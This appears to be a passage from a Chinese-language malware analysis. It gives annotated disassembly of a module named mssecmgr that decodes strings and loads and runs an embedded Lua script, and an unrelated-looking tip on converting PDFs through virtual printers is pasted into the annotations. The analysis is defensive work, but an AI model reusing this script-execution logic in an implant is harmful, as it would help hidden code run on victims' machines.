
    call mssecmgr.100B9285                   ;  table name is "_params"

    mov esi,dword ptr ds:[ebx+0xD4]

    mov dword ptr ss:[esp],mssecmgr.10304BCC

    call mssecmgr.1000E431                   ;  decode string "script"

    pop ecx

    push eax

    call mssecmgr.100B917A                   ;  lua_pushstring

    mov esi,dword ptr ds:[ebx+0xD4]

    pop ecx

    push -0x2

    pop eax

    call mssecmgr.100B9269                   ;  lua_gettable get lua script

    mov esi,dword ptr ds:[ebx+0xD4]

    push -0x2

    pop eax

    call mssecmgr.100B8DFE                   ;  lua_remove

    mov eax,dword ptr ds:[ebx+0xD4]

    and dword ptr ss:[esp+0x10],0x0

    lea ecx,dword ptr ss:[esp+0x10]

    push ecx

    push -0x1

    push eax

    call mssecmgr.100B9C8B                   ;  luaL_checklstring

    mov esi,dword ptr ds:[ebx+0xD4]

    add esp,0xC

    push mssecmgr.10304BE8

    mov edi,eax

    call mssecmgr.1000E431                   ;  decode string "script"

    pop ecx

    push eax

    push dword ptr ss:[esp+0x14]

    mov eax,edi

    call mssecmgr.100BA0B2                   ;  luaL_loadbuffer load lua script

    test eax,eax

    pop ecx

    pop ecx

    jnz mssecmgr.100B8381

    mov ecx,dword ptr ds:[ebx+0xD4]

    xor edi,edi

    push eax

    inc edi

    call mssecmgr.100B966F                   ;  lua_pcall call lua script

    图 3-12读取并执行script的值

    分析发现加密字符串中存在有关虚拟打印机相关字符串, 和大量用作PDF转换的相关软件的名字,推测为判断本机是否安装此类软件,可能会利用这些软件进行转换操作。

    add     esp, 0Ch

    push    offset unk_102CA098

    call    near ptr my_decode_strW ; decode : "Microsoft Office Document Image Writer"

    ; Microsoft Office Document Imaging Writer 独立安装版
    有些人希望把pdf格式的文件转化成word或者jpeg,因此去寻找专用的软件,其实这些软件用起来并不好用,我们可以用office自带的虚拟打印机完成快速转化。 
    1
    pdf-word:Adobe Reader 打开文件,选择打印文件,打印机选为Microsoft Office Document Imaging Writer,打印。会生成一系列*.mdi文件,

    Microsoft Office Document Imaging office工具)打开,用工具下的将文件发送到word”完成转换(相比尚书等软件正确率很高!)。 
    2
    pdf-jpeg:按上面的步骤把pdf转成mdi,再用Microsoft Office Document Imagingmdi转存为*.tag图像文件。一般的绘图软件都可识别tag

    再用这些软件将tag转存成jpeg(这种方法适用通篇文章的转化,局部copy大家都会,不用罗索了)。

     

    add     esp, 4

    mov     [ebp+var_A0], eax

    push    offset unk_102CA148

    call    near ptr my_decode_strW ; decode : "Microsoft XPS Document Writer"

    ;也是一款windows虚拟打印机